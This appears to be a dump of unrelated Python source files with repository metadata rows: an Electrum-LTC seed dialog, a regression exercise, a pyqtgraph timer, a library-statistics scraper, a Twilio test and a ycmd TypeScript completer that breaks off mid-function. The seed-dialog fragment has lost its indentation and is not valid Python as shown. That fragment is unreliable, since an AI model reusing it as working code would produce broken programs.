if seed: # "read only", we already have the text
if for_seed_words:
self.seed_e = ButtonsTextEdit()
else: # e.g. xpub
self.seed_e = ShowQRTextEdit()
self.seed_e.setReadOnly(True)
self.seed_e.setText(seed)
else: # we expect user to enter text
assert for_seed_words
self.seed_e = CompletionTextEdit()
self.seed_e.setTabChangesFocus(False) # so that tab auto-completes
self.is_seed = is_seed
self.saved_is_seed = self.is_seed
self.seed_e.textChanged.connect(self.on_edit)
self.initialize_completer()
self.seed_e.setMaximumHeight(75)
hbox = QHBoxLayout()
if icon:
logo = QLabel()
logo.setPixmap(QPixmap(icon_path("seed.png"))
.scaledToWidth(64, mode=Qt.SmoothTransformation))
logo.setMaximumWidth(60)
hbox.addWidget(logo)
hbox.addWidget(self.seed_e)
self.addLayout(hbox)
hbox = QHBoxLayout()
hbox.addStretch(1)
self.seed_type_label = QLabel('')
hbox.addWidget(self.seed_type_label)
# options
self.is_bip39 = False
self.is_ext = False
if options:
opt_button = EnterButton(_('Options'), self.seed_options)
hbox.addWidget(opt_button)
self.addLayout(hbox)
if passphrase:
hbox = QHBoxLayout()
passphrase_e = QLineEdit()
passphrase_e.setText(passphrase)
passphrase_e.setReadOnly(True)
hbox.addWidget(QLabel(_("Your seed extension is") + ':'))
hbox.addWidget(passphrase_e)
self.addLayout(hbox)
self.addStretch(1)
self.seed_warning = WWLabel('')
if msg:
self.seed_warning.setText(seed_warning_msg(seed))
self.addWidget(self.seed_warning)
def initialize_completer(self):
bip39_english_list = Mnemonic('en').wordlist
old_list = old_mnemonic.wordlist
only_old_list = set(old_list) - set(bip39_english_list)
self.wordlist = list(bip39_english_list) + list(only_old_list) # concat both lists
self.wordlist.sort()
class CompleterDelegate(QStyledItemDelegate):
def initStyleOption(self, option, index):
super().initStyleOption(option, index)
# Some people complained that due to merging the two word lists,
# it is difficult to restore from a metal backup, as they planned
# to rely on the "4 letter prefixes are unique in bip39 word list" property.
# So we color words that are only in old list.
if option.text in only_old_list:
# yellow bg looks ~ok on both light/dark theme, regardless if (un)selected
option.backgroundBrush = ColorScheme.YELLOW.as_color(background=True)
self.completer = QCompleter(self.wordlist)
delegate = CompleterDelegate(self.seed_e)
self.completer.popup().setItemDelegate(delegate)
self.seed_e.set_completer(self.completer)
def get_seed(self):
text = self.seed_e.text()
return ' '.join(text.split())
def on_edit(self):
s = self.get_seed()
b = self.is_seed(s)
if not self.is_bip39:
t = seed_type(s)
label = _('Seed Type') + ': ' + t if t else ''
else:
from electrum_ltc.keystore import bip39_is_checksum_valid
is_checksum, is_wordlist = bip39_is_checksum_valid(s)
status = ('checksum: ' + ('ok' if is_checksum else 'failed')) if is_wordlist else 'unknown wordlist'
label = 'BIP39' + ' (%s)'%status
self.seed_type_label.setText(label)
self.parent.next_button.setEnabled(b)
# disable suggestions if user already typed an unknown word
for word in self.get_seed().split(" ")[:-1]:
if word not in self.wordlist:
self.seed_e.disable_suggestions()
return
self.seed_e.enable_suggestions()
class KeysLayout(QVBoxLayout):
def __init__(self, parent=None, header_layout=None, is_valid=None, allow_multi=False):
QVBoxLayout.__init__(self)
self.parent = parent
self.is_valid = is_valid
self.text_e = ScanQRTextEdit(allow_multi=allow_multi)
self.text_e.textChanged.connect(self.on_edit)
if isinstance(header_layout, str):
self.addWidget(WWLabel(header_layout))
else:
self.addLayout(header_layout)
self.addWidget(self.text_e)
def get_text(self):
return self.text_e.text()
def on_edit(self):
valid = False
try:
valid = self.is_valid(self.get_text())
except Exception as e:
self.parent.next_button.setToolTip(f'{_("Error")}: {str(e)}')
else:
self.parent.next_button.setToolTip('')
self.parent.next_button.setEnabled(valid)
class SeedDialog(WindowModalDialog):
def __init__(self, parent, seed, passphrase):
WindowModalDialog.__init__(self, parent, ('Vialectrum - ' + _('Seed')))
self.setMinimumWidth(400)
vbox = QVBoxLayout(self)
title = _("Your wallet generation seed is:")
slayout = SeedLayout(title=title, seed=seed, msg=True, passphrase=passphrase)
vbox.addLayout(slayout)
vbox.addLayout(Buttons(CloseButton(self)))
| mit | 6,886,666,293,626,559,000 | 40.906383 | 128 | 0.60134 | false |
hahnicity/ace | chapter1/problem3.py | 1 | 1222 | """
Problem 3.
calculate the time series
yt = 5 + .05 * t + Et (Where E is epsilon)
for years 1960, 1961, ..., 2001 assuming Et independently and
identically distributed with mean 0 and sigma 0.2.
"""
from random import uniform
from matplotlib.pyplot import plot, show
from numpy import array, polyfit, poly1d
def create_distribution(size):
"""
Create a distribution, identically distributed, with mean 0 and
sigma 0.2
"""
# Shit it's way easier to just do some uniform distribution
# This is a bit over my head, and not possible for me without
# pen and paper
return array([uniform(-0.2, .2) for _ in xrange(size)])
def create_time_series(start_year, end_year):
"""
Create the time series, yt, then perform a regress on yt, plot yt and the
its trendline
"""
t_array = array(range(start_year, end_year + 1))
epsilon_t = create_distribution(len(t_array))
yt = array([5 + .05 * t_i + epsilon_t[i] for i, t_i in enumerate(t_array)])
fit = polyfit(t_array, yt, 1)
fit_func = poly1d(fit)
plot(t_array, yt, "yo", t_array, fit_func(t_array), "--k")
show()
def main():
create_time_series(1960, 2001)
if __name__ == "__main__":
main()
| unlicense | -3,859,389,947,506,041,300 | 25 | 79 | 0.644845 | false |
robertsj/poropy | pyqtgraph/ThreadsafeTimer.py | 1 | 1600 | from pyqtgraph.Qt import QtCore, QtGui
class ThreadsafeTimer(QtCore.QObject):
"""
Thread-safe replacement for QTimer.
"""
timeout = QtCore.Signal()
sigTimerStopRequested = QtCore.Signal()
sigTimerStartRequested = QtCore.Signal(object)
def __init__(self):
QtCore.QObject.__init__(self)
self.timer = QtCore.QTimer()
self.timer.timeout.connect(self.timerFinished)
self.timer.moveToThread(QtCore.QCoreApplication.instance().thread())
self.moveToThread(QtCore.QCoreApplication.instance().thread())
self.sigTimerStopRequested.connect(self.stop, QtCore.Qt.QueuedConnection)
self.sigTimerStartRequested.connect(self.start, QtCore.Qt.QueuedConnection)
def start(self, timeout):
isGuiThread = QtCore.QThread.currentThread() == QtCore.QCoreApplication.instance().thread()
if isGuiThread:
#print "start timer", self, "from gui thread"
self.timer.start(timeout)
else:
#print "start timer", self, "from remote thread"
self.sigTimerStartRequested.emit(timeout)
def stop(self):
isGuiThread = QtCore.QThread.currentThread() == QtCore.QCoreApplication.instance().thread()
if isGuiThread:
#print "stop timer", self, "from gui thread"
self.timer.stop()
else:
#print "stop timer", self, "from remote thread"
self.sigTimerStopRequested.emit()
def timerFinished(self):
self.timeout.emit() | mit | 4,284,573,127,986,131,500 | 37.073171 | 99 | 0.6225 | false |
glaserti/LibraryTwitter | Python/1 - CSV from HTMLsource.py | 1 | 7213 | #
# Scraping website for information about libraries
#
# For getting information about the libraries, the database of the German Library Statistics (Deutsche Bibliotheksstatistik/DBS) which is hosted by the HBZ was used:
#
# http://www.bibliotheksstatistik.de/eingabe/dynrep/adrbrowser/bibs.php
#
# For this project, 4 different requests were made:
#
# 1. DBS National Libraries ( == > 3 active<sup>(1)</sup> libraries)
# 1. DBS Section 4: University Libraries (i.e. not the entire Section 4 was queried) ( == > 83 active<sup>(2)</sup> libraries)
# 1. DBS Section 1: Public Libraries with population > 400,000 ( == > 18 libraries)<sup>(3)</sup>
# 1. DBS Section 2: Public Libraries with population > 100,000 ( == > 81 libraries)<sup>(4)</sup>
#
# Since the website doesn't give unique URLs for individual requests,
# you could download the source code of each database request and safe as html files.
#
# However, you could use the _printing page_ of the database result list, which returns
# an individual URL. This procedure is followed here, with the URLs given in the list of tuples "urlList".
#
# The result will be saved as a csv file for each database request to the cwd (i.e. current working directory).<sup>(5)</sup>
# Furthermore, those libraries without a valid url will be printed out (in a JSON prettyprint style).
#
# ---
#
# <sup>(1)</sup> In DBS National Libraries, there are actually four libraries listed, but one is inactive.
#
# <sup>(2)</sup> In DBS Section 4: University Libraries, there are actually 84 libraries listed, but one is inactive.
#
# <sup>(3)</sup> Two libraries were added manually to this goup of libraries: The Hamburger Bücherhallen, whose entry in DBS omitted the DBV Section, and the Zentral- und Landesbibliothek Berlin, which was listed as member of Section 4 "Wissenschaftliche Universalbibliotheken", though the library is member of Section 1 (and only guest member of Section 4 according to the DBV webpage (http://www.bibliotheksverband.de/mitglieder/).
#
# <sup>(4)</sup> From DBS Section 2, two libraries (KA119 and KA129) were removed: These are small "ehrenamtlich geführte" libraries (less than 1,000 books) without any presence on the internet.
# For two more libraries (MB026 and GY440) the urls, missing in the DBS, were added manually.
#
# <sup>(5)</sup> To find out, what your cwd is, type:
#
# >```import os
# >print os.getcwd()```
#
# ---
#
# Data was collected: 2014-02-08
#
# List of URLs
#
# List of tuples of name & url
# urlList[0] = Nr. 1 (DBS National Libraries)
# urlList[1] = Nr. 2 (DBS Section 4, University Libraries)
# urlList[2] = Nr. 3 (DBS Section 1)
# urlList[3] = Nr. 4 (DBS Section 2)
urlList = [('DBS_NatBib', 'http://www.bibliotheksstatistik.de/eingabe/dynrep/adrbrowser/adrbrowser.php?prt=AG012|AG292|AG000|AK001'),
('DBS_4_UB', 'http://www.bibliotheksstatistik.de/eingabe/dynrep/adrbrowser/adrbrowser.php?prt=EM482|AH715|EJ882|EX035|AA708|AG188|DB900|DE081|AD011|DB079|AF093|AH090|AA289|MM201|AF007|EL283|AJ082|AB294|AD291|AE088|AX001|AA046|AC018|AB105|AA083|EL131|AE830|AL091|AE027|BK213|AX566|AL352|AK517|EX461|AL005|AL017|AG061|AC006|AE003|AB038|AK384|AD473|AH703|AB361|AD084|AK104|AF020|AA290|DE100|SB005|AL029|AK025|AB026|AA009|AH089|AH016|AN087|AJ100|EL039|AC030|AE386|AA034|AJ008|BD987|AE015|BD296|AH077|AE180|AH004|AF019|AK700|AH466|AH739|AJ355|AH028|AL467|AB385|AJ021|BZ398|AC468|DC072|DA385|BE926|FH880'),
('DBS_1', 'http://www.bibliotheksstatistik.de/eingabe/dynrep/adrbrowser/adrbrowser.php?prt=AJ197|GE486|AA381|AE131|AH478|AJ136|AE064|AK062|AG115|AB075|AJ380|AL480|AH132|AA277|AE362|AE106'),
('DBS_2', 'http://www.bibliotheksstatistik.de/eingabe/dynrep/adrbrowser/adrbrowser.php?prt=AF111|MB026|GB291|AH259|GC556|KA119|KA129|GD895|AJ367|AF238|AD242|AD072|AG243|GY440|AA186|AB063|AH181|AD369|AC134|AF135|GE231|KS124|AL285|AF196|KQ152|AK116|AG279|AE295|AD217|GD822|AK153|GM675|AG267|AK293|AC286|AB178|AF275|AJ033|AL157|AC122|AJ471|WB861|LD510|GC283|AD059|MB038|AA174|AG371|AG231|LC499|LC505|AJ069|AG073|GB850|WB782|MB014|AH260|AH168|GC301|AJ264|GD998|GE012|GE036|MB002|GD767|AD163|AH351|AC262|GA444|GE462|GB746|AA472|GE899|AH247|AA447|AB270|GE164|GA596|AH284|AF470|AB142|AD229|JA868')]
#
# Functions
#
from bs4 import BeautifulSoup
import urllib2
import json
import csv
def writeDict(bsString):
s = bsString.lstrip() # stripping off leading whitespace
i1 = s.find("(DBS-ID: ")
i2 = i1 + len("(DBS-ID: ")
i3 = s.find(", Sig.") # if there is no Sig. given, i3 returns -1 [i.e. the closing paren ")"]
name = s[:i1-1]
i4 = name.find(' ') # to get the place, split name at first white space
dbsID = s[i2:i3]
place = name[:i4]
dic = {}
dic['DBS-ID'] = dbsID.encode("utf-8") # BeautifulSoup encodes in Unicode,
dic['Name'] = name.encode("utf-8") # which is not supported by csv;
dic['Ort'] = place.encode("utf-8") # hence encoding to utf-8 is necessary
dic['Twitter'] = ''
return dic
def findURL(soupTAG):
urlTAG = soupTAG.find_next("a")
url = urlTAG.get('href')
d = {}
d['URL'] = url.encode("utf-8")
return d
def parseHTML(soupHTML):
l = []
loD = []
s0 = soupHTML.table.table.h3
while type(s0) != type(None): # first write each entry which is not NoneType to a list
l.append(s0)
s_next = s0.find_next("h3")
s0 = s_next
for i in l:
url = findURL(i) # finding the next url for each entry
si = i.string # second write each string of the list which is not NoneType
if type(si) != type(None): # to a List of Dictionaries
di = writeDict(si)
di.update(url) # adding the url to the dict
loD.append(di)
else:
pass
return loD
def libCSV(index_of_urlList):
'''
pass as argument the index number of the urlList
prints out
(1.) Nr. of (active) libraries in the list
(2.) A JSON prettyprint list of libraries without a valid url
(3.) The name of the csv file.
Saves the csv file in the cwd.
'''
tup = urlList[index_of_urlList]
u = tup[1]
web = urllib2.urlopen(u)
webHTML = web.read()
web.close()
soup = BeautifulSoup(webHTML)
result = parseHTML(soup)
print 'For', tup[0], len(result), '(active) libraries could be found.'
for i in result:
if i["URL"] == "":
print 'For this library no URL could be found: \n'
print json.dumps(i, indent=1), '\n'
filename = tup[0] + '.csv'
l1 = len(filename) + len('The csv will be safed as ')
print "\n"+ l1*"=" + "\n"
print 'The csv will be safed as', filename
return exp2CSV(result, filename)
def exp2CSV(listOfDict, filename):
'''
arguments = list of dictionaries, filename
output = saves file to cwd (current working directory)
'''
outputfile = filename
keyz = listOfDict[0].keys()
f = open(outputfile,'w')
dict_writer = csv.DictWriter(f,keyz)
dict_writer.writer.writerow(keyz)
dict_writer.writerows(listOfDict)
f.close()
| mit | 6,047,267,657,044,713,000 | 43.239264 | 611 | 0.675912 | false |
tysonholub/twilio-python | tests/integration/taskrouter/v1/workspace/worker/test_worker_statistics.py | 1 | 3649 | # coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from tests import IntegrationTestCase
from tests.holodeck import Request
from twilio.base.exceptions import TwilioException
from twilio.http.response import Response
class WorkerStatisticsTestCase(IntegrationTestCase):
def test_fetch_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.taskrouter.v1.workspaces(sid="WSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.workers(sid="WKXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.statistics().fetch()
self.holodeck.assert_has_request(Request(
'get',
'https://taskrouter.twilio.com/v1/Workspaces/WSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/Workers/WKXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/Statistics',
))
def test_fetch_response(self):
self.holodeck.mock(Response(
200,
'''
{
"cumulative": {
"reservations_created": 100,
"reservations_accepted": 100,
"reservations_rejected": 100,
"reservations_timed_out": 100,
"reservations_canceled": 100,
"reservations_rescinded": 100,
"activity_durations": [
{
"max": 0,
"min": 900,
"sid": "WAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"friendly_name": "Offline",
"avg": 1080,
"total": 5400
},
{
"max": 0,
"min": 900,
"sid": "WAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"friendly_name": "Busy",
"avg": 1012,
"total": 8100
},
{
"max": 0,
"min": 0,
"sid": "WAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"friendly_name": "Idle",
"avg": 0,
"total": 0
},
{
"max": 0,
"min": 0,
"sid": "WAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"friendly_name": "Reserved",
"avg": 0,
"total": 0
}
],
"start_time": "2008-01-02T00:00:00Z",
"end_time": "2008-01-02T00:00:00Z"
},
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"workspace_sid": "WSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"worker_sid": "WKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"url": "https://taskrouter.twilio.com/v1/Workspaces/WSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Workers/WKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Statistics"
}
'''
))
actual = self.client.taskrouter.v1.workspaces(sid="WSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.workers(sid="WKXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.statistics().fetch()
self.assertIsNotNone(actual)
| mit | -9,054,563,449,457,598,000 | 39.098901 | 157 | 0.435462 | false |
mispencer/ycmd | ycmd/completers/typescript/typescript_completer.py | 1 | 22168 | # Copyright (C) 2015 - 2016 Google Inc.
# 2016 ycmd contributors
#
# This file is part of ycmd.
#
# ycmd is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ycmd is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ycmd. If not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from future import standard_library
standard_library.install_aliases()
from builtins import * # noqa
import json
import logging
import os
import re
import subprocess
import itertools
import threading
from tempfile import NamedTemporaryFile
from ycmd import responses
from ycmd import utils
from ycmd.completers.completer import Completer
from ycmd.completers.completer_utils import GetFileContents
BINARY_NOT_FOUND_MESSAGE = ( 'TSServer not found. '
'TypeScript 1.5 or higher is required.' )
SERVER_NOT_RUNNING_MESSAGE = 'TSServer is not running.'
MAX_DETAILED_COMPLETIONS = 100
RESPONSE_TIMEOUT_SECONDS = 10
PATH_TO_TSSERVER = utils.FindExecutable( 'tsserver' )
LOGFILE_FORMAT = 'tsserver_'
_logger = logging.getLogger( __name__ )
class DeferredResponse( object ):
"""
A deferred that resolves to a response from TSServer.
"""
def __init__( self, timeout = RESPONSE_TIMEOUT_SECONDS ):
self._event = threading.Event()
self._message = None
self._timeout = timeout
def resolve( self, message ):
self._message = message
self._event.set()
def result( self ):
self._event.wait( timeout = self._timeout )
if not self._event.isSet():
raise RuntimeError( 'Response Timeout' )
message = self._message
if not message[ 'success' ]:
raise RuntimeError( message[ 'message' ] )
if 'body' in message:
return self._message[ 'body' ]
def ShouldEnableTypescriptCompleter():
if not PATH_TO_TSSERVER:
_logger.error( BINARY_NOT_FOUND_MESSAGE )
return False
_logger.info( 'Using TSServer located at {0}'.format( PATH_TO_TSSERVER ) )
return True
class TypeScriptCompleter( Completer ):
"""
Completer for TypeScript.
It uses TSServer which is bundled with TypeScript 1.5
See the protocol here:
https://github.com/Microsoft/TypeScript/blob/2cb0dfd99dc2896958b75e44303d8a7a32e5dc33/src/server/protocol.d.ts
"""
def __init__( self, user_options ):
super( TypeScriptCompleter, self ).__init__( user_options )
self._logfile = None
self._tsserver_handle = None
# Used to prevent threads from concurrently writing to
# the tsserver process' stdin
self._write_lock = threading.Lock()
# Each request sent to tsserver must have a sequence id.
# Responses contain the id sent in the corresponding request.
self._sequenceid = itertools.count()
# Used to prevent threads from concurrently accessing the sequence counter
self._sequenceid_lock = threading.Lock()
self._server_lock = threading.RLock()
# Used to read response only if TSServer is running.
self._tsserver_is_running = threading.Event()
# Start a thread to read response from TSServer.
self._thread = threading.Thread( target = self._ReaderLoop, args = () )
self._thread.daemon = True
self._thread.start()
self._StartServer()
# Used to map sequence id's to their corresponding DeferredResponse
# objects. The reader loop uses this to hand out responses.
self._pending = {}
# Used to prevent threads from concurrently reading and writing to
# the pending response dictionary
self._pending_lock = threading.Lock()
_logger.info( 'Enabling typescript completion' )
def _StartServer( self ):
with self._server_lock:
if self._ServerIsRunning():
return
self._logfile = utils.CreateLogfile( LOGFILE_FORMAT )
tsserver_log = '-file {path} -level {level}'.format( path = self._logfile,
level = _LogLevel() )
# TSServer gets the configuration for the log file through the
# environment variable 'TSS_LOG'. This seems to be undocumented but
# looking at the source code it seems like this is the way:
# https://github.com/Microsoft/TypeScript/blob/8a93b489454fdcbdf544edef05f73a913449be1d/src/server/server.ts#L136
environ = os.environ.copy()
utils.SetEnviron( environ, 'TSS_LOG', tsserver_log )
_logger.info( 'TSServer log file: {0}'.format( self._logfile ) )
# We need to redirect the error stream to the output one on Windows.
self._tsserver_handle = utils.SafePopen( PATH_TO_TSSERVER,
stdin = subprocess.PIPE,
stdout = subprocess.PIPE,
stderr = subprocess.STDOUT,
env = environ )
self._tsserver_is_running.set()
def _ReaderLoop( self ):
"""
Read responses from TSServer and use them to resolve
the DeferredResponse instances.
"""
while True:
self._tsserver_is_running.wait()
try:
message = self._ReadMessage()
except RuntimeError:
_logger.exception( SERVER_NOT_RUNNING_MESSAGE )
self._tsserver_is_running.clear()
continue
# We ignore events for now since we don't have a use for them.
msgtype = message[ 'type' ]
if msgtype == 'event':
eventname = message[ 'event' ]
_logger.info( 'Received {0} event from tsserver'.format( eventname ) )
continue
if msgtype != 'response':
_logger.error( 'Unsupported message type {0}'.format( msgtype ) )
continue
seq = message[ 'request_seq' ]
with self._pending_lock:
if seq in self._pending:
self._pending[ seq ].resolve( message )
del self._pending[ seq ]
def _ReadMessage( self ):
"""Read a response message from TSServer."""
# The headers are pretty similar to HTTP.
# At the time of writing, 'Content-Length' is the only supplied header.
headers = {}
while True:
headerline = self._tsserver_handle.stdout.readline().strip()
if not headerline:
break
key, value = utils.ToUnicode( headerline ).split( ':', 1 )
headers[ key.strip() ] = value.strip()
# The response message is a JSON object which comes back on one line.
# Since this might change in the future, we use the 'Content-Length'
# header.
if 'Content-Length' not in headers:
raise RuntimeError( "Missing 'Content-Length' header" )
contentlength = int( headers[ 'Content-Length' ] )
# TSServer adds a newline at the end of the response message and counts it
# as one character (\n) towards the content length. However, newlines are
# two characters on Windows (\r\n), so we need to take care of that. See
# issue https://github.com/Microsoft/TypeScript/issues/3403
content = self._tsserver_handle.stdout.read( contentlength )
if utils.OnWindows() and content.endswith( b'\r' ):
content += self._tsserver_handle.stdout.read( 1 )
return json.loads( utils.ToUnicode( content ) )
def _BuildRequest( self, command, arguments = None ):
"""Build TSServer request object."""
with self._sequenceid_lock:
seq = next( self._sequenceid )
request = {
'seq': seq,
'type': 'request',
'command': command
}
if arguments:
request[ 'arguments' ] = arguments
return request
def _WriteRequest( self, request ):
"""Write a request to TSServer stdin."""
serialized_request = utils.ToBytes( json.dumps( request ) + '\n' )
with self._write_lock:
try:
self._tsserver_handle.stdin.write( serialized_request )
self._tsserver_handle.stdin.flush()
# IOError is an alias of OSError in Python 3.
except ( AttributeError, IOError ):
_logger.exception( SERVER_NOT_RUNNING_MESSAGE )
raise RuntimeError( SERVER_NOT_RUNNING_MESSAGE )
def _SendCommand( self, command, arguments = None ):
"""
Send a request message to TSServer but don't wait for the response.
This function is to be used when we don't care about the response
to the message that is sent.
"""
request = self._BuildRequest( command, arguments )
self._WriteRequest( request )
def _SendRequest( self, command, arguments = None ):
"""
Send a request message to TSServer and wait
for the response.
"""
request = self._BuildRequest( command, arguments )
deferred = DeferredResponse()
with self._pending_lock:
seq = request[ 'seq' ]
self._pending[ seq ] = deferred
self._WriteRequest( request )
return deferred.result()
def _Reload( self, request_data ):
"""
Syncronize TSServer's view of the file to
the contents of the unsaved buffer.
"""
filename = request_data[ 'filepath' ]
contents = request_data[ 'file_data' ][ filename ][ 'contents' ]
tmpfile = NamedTemporaryFile( delete = False )
tmpfile.write( utils.ToBytes( contents ) )
tmpfile.close()
self._SendRequest( 'reload', {
'file': filename,
'tmpfile': tmpfile.name
} )
utils.RemoveIfExists( tmpfile.name )
def _ServerIsRunning( self ):
with self._server_lock:
return utils.ProcessIsRunning( self._tsserver_handle )
def ServerIsHealthy( self ):
return self._ServerIsRunning()
def SupportedFiletypes( self ):
return [ 'typescript' ]
def ComputeCandidatesInner( self, request_data ):
self._Reload( request_data )
entries = self._SendRequest( 'completions', {
'file': request_data[ 'filepath' ],
'line': request_data[ 'line_num' ],
'offset': request_data[ 'start_codepoint' ]
} )
# A less detailed version of the completion data is returned
# if there are too many entries. This improves responsiveness.
if len( entries ) > MAX_DETAILED_COMPLETIONS:
return [ _ConvertCompletionData(e) for e in entries ]
names = []
namelength = 0
for e in entries:
name = e[ 'name' ]
namelength = max( namelength, len( name ) )
names.append( name )
detailed_entries = self._SendRequest( 'completionEntryDetails', {
'file': request_data[ 'filepath' ],
'line': request_data[ 'line_num' ],
'offset': request_data[ 'start_codepoint' ],
'entryNames': names
} )
return [ _ConvertDetailedCompletionData( e, namelength )
for e in detailed_entries ]
def GetSubcommandsMap( self ):
return {
'RestartServer' : ( lambda self, request_data, args:
self._RestartServer( request_data ) ),
'StopServer' : ( lambda self, request_data, args:
self._StopServer() ),
'GoToDefinition' : ( lambda self, request_data, args:
self._GoToDefinition( request_data ) ),
'GoToReferences' : ( lambda self, request_data, args:
self._GoToReferences( request_data ) ),
'GoToType' : ( lambda self, request_data, args:
self._GoToType( request_data ) ),
'GetType' : ( lambda self, request_data, args:
self._GetType( request_data ) ),
'GetDoc' : ( lambda self, request_data, args:
self._GetDoc( request_data ) ),
'RefactorRename' : ( lambda self, request_data, args:
self._RefactorRename( request_data, args ) ),
}
def OnBufferVisit( self, request_data ):
filename = request_data[ 'filepath' ]
self._SendCommand( 'open', { 'file': filename } )
def OnBufferUnload( self, request_data ):
filename = request_data[ 'filepath' ]
self._SendCommand( 'close', { 'file': filename } )
def OnFileReadyToParse( self, request_data ):
self._Reload( request_data )
def _GoToDefinition( self, request_data ):
self._Reload( request_data )
try:
filespans = self._SendRequest( 'definition', {
'file': request_data[ 'filepath' ],
'line': request_data[ 'line_num' ],
'offset': request_data[ 'column_codepoint' ]
} )
span = filespans[ 0 ]
return responses.BuildGoToResponseFromLocation(
_BuildLocation( utils.SplitLines( GetFileContents( request_data,
span[ 'file' ] ) ),
span[ 'file' ],
span[ 'start' ][ 'line' ],
span[ 'start' ][ 'offset' ] ) )
except RuntimeError:
raise RuntimeError( 'Could not find definition' )
def _GoToReferences( self, request_data ):
self._Reload( request_data )
response = self._SendRequest( 'references', {
'file': request_data[ 'filepath' ],
'line': request_data[ 'line_num' ],
'offset': request_data[ 'column_codepoint' ]
} )
return [
responses.BuildGoToResponseFromLocation(
_BuildLocation( utils.SplitLines( GetFileContents( request_data,
ref[ 'file' ] ) ),
ref[ 'file' ],
ref[ 'start' ][ 'line' ],
ref[ 'start' ][ 'offset' ] ),
ref[ 'lineText' ] )
for ref in response[ 'refs' ]
]
def _GoToType( self, request_data ):
self._Reload( request_data )
try:
filespans = self._SendRequest( 'typeDefinition', {
'file': request_data[ 'filepath' ],
'line': request_data[ 'line_num' ],
'offset': request_data[ 'column_num' ]
} )
span = filespans[ 0 ]
return responses.BuildGoToResponse(
filepath = span[ 'file' ],
line_num = span[ 'start' ][ 'line' ],
column_num = span[ 'start' ][ 'offset' ]
)
except RuntimeError:
raise RuntimeError( 'Could not find type definition' )
def _GetType( self, request_data ):
self._Reload( request_data )
info = self._SendRequest( 'quickinfo', {
'file': request_data[ 'filepath' ],
'line': request_data[ 'line_num' ],
'offset': request_data[ 'column_codepoint' ]
} )
return responses.BuildDisplayMessageResponse( info[ 'displayString' ] )
def _GetDoc( self, request_data ):
self._Reload( request_data )
info = self._SendRequest( 'quickinfo', {
'file': request_data[ 'filepath' ],
'line': request_data[ 'line_num' ],
'offset': request_data[ 'column_codepoint' ]
} )
message = '{0}\n\n{1}'.format( info[ 'displayString' ],
info[ 'documentation' ] )
return responses.BuildDetailedInfoResponse( message )
def _RefactorRename( self, request_data, args ):
if len( args ) != 1:
raise ValueError( 'Please specify a new name to rename it to.\n'
'Usage: RefactorRename <new name>' )
self._Reload( request_data )
response = self._SendRequest( 'rename', {
'file': request_data[ 'filepath' ],
'line': request_data[ 'line_num' ],
'offset': request_data[ 'column_codepoint' ],
'findInComments': False,
'findInStrings': False,
} )
if not response[ 'info' ][ 'canRename' ]:
raise RuntimeError( 'Value cannot be renamed: {0}'.format(
response[ 'info' ][ 'localizedErrorMessage' ] ) )
# The format of the response is:
#
# body {
# info {
# ...
# triggerSpan: {
# length: original_length
# }
# }
#
# locs [ {
# file: file_path
# locs: [
# start: {
# line: line_num
# offset: offset
# }
# end {
# line: line_num
# offset: offset
# }
# ] }
# ]
# }
#
new_name = args[ 0 ]
location = responses.Location( request_data[ 'line_num' ],
request_data[ 'column_num' ],
request_data[ 'filepath' ] )
chunks = []
for file_replacement in response[ 'locs' ]:
chunks.extend( _BuildFixItChunksForFile( request_data,
new_name,
file_replacement ) )
return responses.BuildFixItResponse( [
responses.FixIt( location, chunks )
] )
def _RestartServer( self, request_data ):
with self._server_lock:
self._StopServer()
self._StartServer()
# This is needed because after we restart the TSServer it would lose all
# the information about the files we were working on. This means that the
# newly started TSServer will know nothing about the buffer we're working
# on after restarting the server. So if we restart the server and right
# after that ask for completion in the buffer, the server will timeout.
# So we notify the server that we're working on the current buffer.
self.OnBufferVisit( request_data )
def _StopServer( self ):
with self._server_lock:
if self._ServerIsRunning():
_logger.info( 'Stopping TSServer with PID {0}'.format(
self._tsserver_handle.pid ) )
self._SendCommand( 'exit' )
try:
utils.WaitUntilProcessIsTerminated( self._tsserver_handle,
timeout = 5 )
_logger.info( 'TSServer stopped' )
except RuntimeError:
_logger.exception( 'Error while stopping TSServer' )
self._CleanUp()
def _CleanUp( self ):
utils.CloseStandardStreams( self._tsserver_handle )
self._tsserver_handle = None
if not self.user_options[ 'server_keep_logfiles' ]:
utils.RemoveIfExists( self._logfile )
self._logfile = None
def Shutdown( self ):
self._StopServer()
def DebugInfo( self, request_data ):
with self._server_lock:
if self._ServerIsRunning():
return ( 'TypeScript completer debug information:\n'
' TSServer running\n'
' TSServer process ID: {0}\n'
' TSServer executable: {1}\n'
' TSServer logfile: {2}'.format( self._tsserver_handle.pid,
PATH_TO_TSSERVER,
self._logfile ) )
if self._logfile:
return ( 'TypeScript completer debug information:\n'
' TSServer no longer running\n'
' TSServer executable: {0}\n'
' TSServer logfile: {1}'.format( PATH_TO_TSSERVER,
self._logfile ) )
return ( 'TypeScript completer debug information:\n'
' TSServer is not running\n'
